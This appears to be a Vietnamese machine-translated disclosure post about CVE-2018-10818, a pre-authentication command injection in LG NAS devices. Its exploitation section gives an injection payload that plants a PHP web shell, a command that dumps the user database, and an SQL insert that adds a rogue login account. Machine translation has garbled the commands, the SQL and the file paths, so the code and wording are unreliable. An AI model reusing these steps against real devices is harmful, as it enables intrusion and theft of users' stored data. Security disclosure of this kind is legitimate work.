Lỗ hổng nghiêm trọng được tìm thấy trong phần lớn các thiết bị NAS của LG


Tổng quat:

Chúng tôi đã tiến hành đánh giá toàn diện trên thiết bị LG NAS. Thiết bị này là thiết bị lưu trữ được kết nối với mạng chỉ cho phép người dùng được ủy quyền. Nó giống như một đám mây riêng, chỉ tốn ít chi phí, hoạt động đơn giản và mang lại cho bạn quyền kiểm soát hoàn toàn. Tuy nhiên, chúng tôi đã tìm ra cách hack vào hệ thống bằng cách sử dụng lỗ hổng tiêm lệnh từ xa được xác thực trước (CVE-2018-10818), sau đó có thể cho phép chúng tôi thực hiện hầu như mọi thứ, kể cả truy cập dữ liệu và giả mạo dữ liệu và nội dung của người dùng. 

Khai thác:

Lỗ hổng (CVE-2018-10818) là lỗ hổng tiêm lệnh từ xa trước khi xác thực được tìm thấy trong phần lớn các thiết bị NAS của LG.

Như chúng tôi hiển thị trong video, bạn không thể đăng nhập bằng bất kỳ tên người dùng và mật khẩu ngẫu nhiên nào. Tuy nhiên, có một lỗ hổng tiêm lệnh trong tham số mật khẩu của mật khẩu (bạn phải sử dụng một bộ chặn như burp). Chúng ta chỉ cần kích hoạt lỗi này bằng cách thêm vào nó. Để thêm người dùng mới, chúng ta chỉ cần viết shell liên tục có tên c.php bằng cách sử dụng:
; tiếng vang > / tmp / x2; sudo mv / tmp / x2 /var/www/c.php
Nhập nó làm mật khẩu khai thác lỗ hổng.

Sau đó, bằng cách chuyển lệnh sau, chúng ta có thể loại bỏ các người dùng:
echo người dùng .dump người dùng | sqlite3 /etc/nas/db/share.db
Bán phá giá có nghĩa là đọc tất cả dữ liệu cơ sở dữ liệu. Chúng tôi kết xuất cơ sở dữ liệu để có thể thấy tên người dùng và mật khẩu của người dùng. Điều này cũng cho phép chúng tôi thêm riêng của chúng tôi.

Để thêm người dùng mới vào cơ sở dữ liệu, chúng ta cần tạo MD5 hợp lệ. Chúng tôi có thể sử dụng công cụ MD5 đi kèm để tạo hàm băm với tên người dùng
sudo mũi-chung md5 1234
Khi chúng tôi có mật khẩu và tên người dùng hợp lệ, chúng tôi có thể thêm nó vào cơ sở dữ liệu như sau:
XÁC NHẬN VÀO NỀN TẢNG VÀO GIÁ TRỊ CỦA NGƯỜI DÙNG VÀNG (‘test,, md5_hash,, Vul Vul Test Test, thử nghiệm @ localhost, trên mạng);
Sau khi hoàn thành, chúng tôi có thể đăng nhập vào Bộ lưu trữ mạng LG bằng kiểm tra tên người dùng và mật khẩu 1234.

Điều này cho phép chúng tôi truy cập vào hệ thống như một người dùng được ủy quyền. Từ đây chúng tôi có thể truy cập bất kỳ dữ liệu hoặc tập tin phân loại nào được lưu trữ trên thiết bị LAS.

Khuyến nghị:

  • Xin lưu ý rằng các thiết bị LAS có thể bị hack và khai thác.
  • Liên hệ với LG và cho họ biết về lỗ hổng này và yêu cầu họ khắc phục.
  • Cảnh báo bạn bè của bạn trên facebook (ở đây là một liên kết) hoặc twitter (nhấp để tweet)
Kim Martin Administrator
Sorry! The Author has not filled his profile.
follow me
    Like this post? Please share to your friends:
    Adblock
    detector
    map